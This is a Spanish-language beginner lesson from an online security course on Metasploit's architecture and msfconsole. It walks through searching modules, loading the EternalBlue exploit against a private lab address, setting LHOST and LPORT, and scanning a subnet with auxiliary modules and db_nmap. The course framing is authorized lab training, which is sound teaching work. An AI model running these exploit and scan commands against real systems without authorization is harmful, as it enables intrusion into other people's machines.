Arquitectura de Metasploit y msfconsole
Navegue por msfconsole, comprenda la estructura de exploits, payloads y módulos, y configure sus opciones.
Arquitectura de Metasploit y msfconsole es una lección gratuita de Cyber Security Academy en CoddyKit. Esta es la lección 1 de 4. Puedes leer la lección completa abajo gratuitamente — luego la practicas en el navegador con un editor de código integrado y un tutor de IA 24/7. Forma parte de la ruta de aprendizaje de Cyber Security Academy, y tu progreso se sincroniza en la web y la app de CoddyKit. El curso de Cyber Security Academy incluye 4 lecciones en total.
¿Qué es Metasploit?
Metasploit Framework es una plataforma de código abierto para pruebas de penetración que proporciona una interfaz unificada para desarrollar, probar y ejecutar exploits. Es la herramienta estándar del sector para realizar explotaciones autorizadas en entornos de laboratorio.
Componentes de Metasploit
Componentes principales: msfconsole (CLI interactiva), msfvenom (generador de payloads), Metasploit DB (PostgreSQL para almacenar hosts y sesiones) y Armitage (interfaz gráfica).
Inicio de msfconsole
Inicie msfconsole e inicialice la base de datos. El prompt cambia a msf6 >. La autocompletación con el tabulador funciona con todos los comandos, nombres de módulos y opciones.
# Start msfconsole
msfconsole
# Initialize database (if needed)
msfdb init
msfdb start
# Check DB connection
msf6 > db_status
# [*] Connected to msf. Connection type: postgresql.Tipos de módulos
Metasploit organiza sus capacidades en tipos de módulos: exploit (código de ataque específico para una vulnerabilidad), payload (código que se ejecuta después de la explotación), auxiliary (escáneres y fuzzers), post (pos-explotación), encoder y nop.
msf6 > show exploits # list exploit modules
msf6 > show auxiliary # list auxiliary modules
msf6 > show payloads # list payloads
msf6 > show post # post-exploitation modulesBúsqueda de módulos
El comando search filtra los módulos por nombre, CVE, plataforma o clasificación. La clasificación del módulo indica su fiabilidad: Excellent > Great > Good > Normal > Average > Low.
msf6 > search type:exploit name:eternalblue
msf6 > search cve:2021-44228
msf6 > search platform:windows smb
msf6 > search rank:excellent ms17Uso de un módulo de exploit
Seleccione un módulo con use, consulte las opciones necesarias con show options, establezca los valores con set y ejecútelo con run o exploit.
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue) > show options
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.100
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.10
msf6 exploit(ms17_010_eternalblue) > runConfiguración de opciones globales
setg establece opciones globalmente para todos los módulos posteriores, lo que resulta útil para LHOST, LPORT y RHOSTS cuando permanecen constantes durante toda una evaluación.
msf6 > setg LHOST 192.168.1.10
msf6 > setg LPORT 4444
# Unset global
msf6 > unsetg LHOSTMódulos auxiliares
Los módulos auxiliares realizan tareas de análisis, enumeración y fuzzing sin entregar payloads. Algunos ejemplos son el escáner de versiones de SMB, la fuerza bruta de inicios de sesión SSH y el escáner de directorios HTTP.
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(smb_version) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(smb_version) > set THREADS 10
msf6 auxiliary(smb_version) > runGestión de espacios de trabajo
Los espacios de trabajo organizan los datos de análisis y las sesiones de cada evaluación. Cree un espacio de trabajo nuevo al inicio de cada evaluación para mantener los datos separados.
msf6 > workspace # list workspaces
msf6 > workspace -a lab_test # create
msf6 > workspace lab_test # switch
msf6 > hosts # show discovered hosts
msf6 > services # show discovered servicesIntegración con Nmap
Importe directamente los resultados de análisis XML de Nmap en la base de datos de Metasploit para rellenar las tablas de hosts y servicios, lo que permite seleccionar módulos específicos para el objetivo.
msf6 > db_nmap -sV 192.168.1.0/24
# Or import existing XML:
msf6 > db_import /path/to/scan.xml
msf6 > hosts
msf6 > services -p 445Ayuda y documentación
Cada módulo incluye documentación integrada. Utilice info para leer la descripción del módulo, su clasificación de fiabilidad, sus referencias (CVE y avisos) y las opciones necesarias.
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > info
# Shows: description, CVE references,
# platform, architecture, reliability rankComprobación rápida
¿Qué comando selecciona un módulo en msfconsole?
Resumen: Arquitectura de Metasploit
msfconsole es el centro principal: permite buscar módulos, establecer opciones, ejecutar exploits y gestionar sesiones. Trabaje siempre dentro de un espacio de trabajo con nombre, importe los resultados de Nmap para rellenar la base de datos y lea la información del módulo antes de ejecutar cualquier acción: comprenda qué está ejecutando y por qué.
Preguntas frecuentes
¿La lección «Arquitectura de Metasploit y msfconsole» es gratis?
Sí — el texto completo de «Arquitectura de Metasploit y msfconsole» es gratis para leer aquí en la web. Para practicarla de forma interactiva (editor de código integrado y tutor de IA 24/7) y desbloquear el resto del curso de Cyber Security Academy, actualiza a CoddyKit PRO. El curso de Cyber Security Academy incluye 4 lecciones en total.
¿Qué aprenderé en «Arquitectura de Metasploit y msfconsole»?
Navegue por msfconsole, comprenda la estructura de exploits, payloads y módulos, y configure sus opciones. Practicas Cyber Security Academy con código real que ejecutas directamente en el navegador, y un tutor de IA 24/7 responde tus preguntas mientras trabajas en la lección.
¿Necesito experiencia previa para empezar Cyber Security Academy?
No se requiere experiencia previa. Cyber Security Academy en CoddyKit está estructurado para principiantes hasta estudiantes avanzados, así que puedes empezar aquí o desde el inicio y avanzar a tu ritmo. Esta es la lección 1 de 4.
¿Cuánto tiempo toma la lección «Arquitectura de Metasploit y msfconsole»?
La mayoría de las lecciones de CoddyKit toman alrededor de 5–10 minutos. Cada una es compacta e interactiva, así que avanzas constantemente y retomas exactamente por donde dejaste en la web y la app.
¿Puedo escribir y ejecutar código en esta lección de Cyber Security Academy?
Sí. Cada lección de Cyber Security Academy incluye un editor de código integrado, así que escribes y ejecutas código real directamente en tu navegador y obtienes retroalimentación instantánea de IA — sin configuración local necesaria.
Todas las lecciones de este curso
- Arquitectura de Metasploit y msfconsole
- Explotación de una vulnerabilidad conocida
- Payloads: con etapas y sin etapas, Meterpreter
- Postexplotación: pivotar y persistir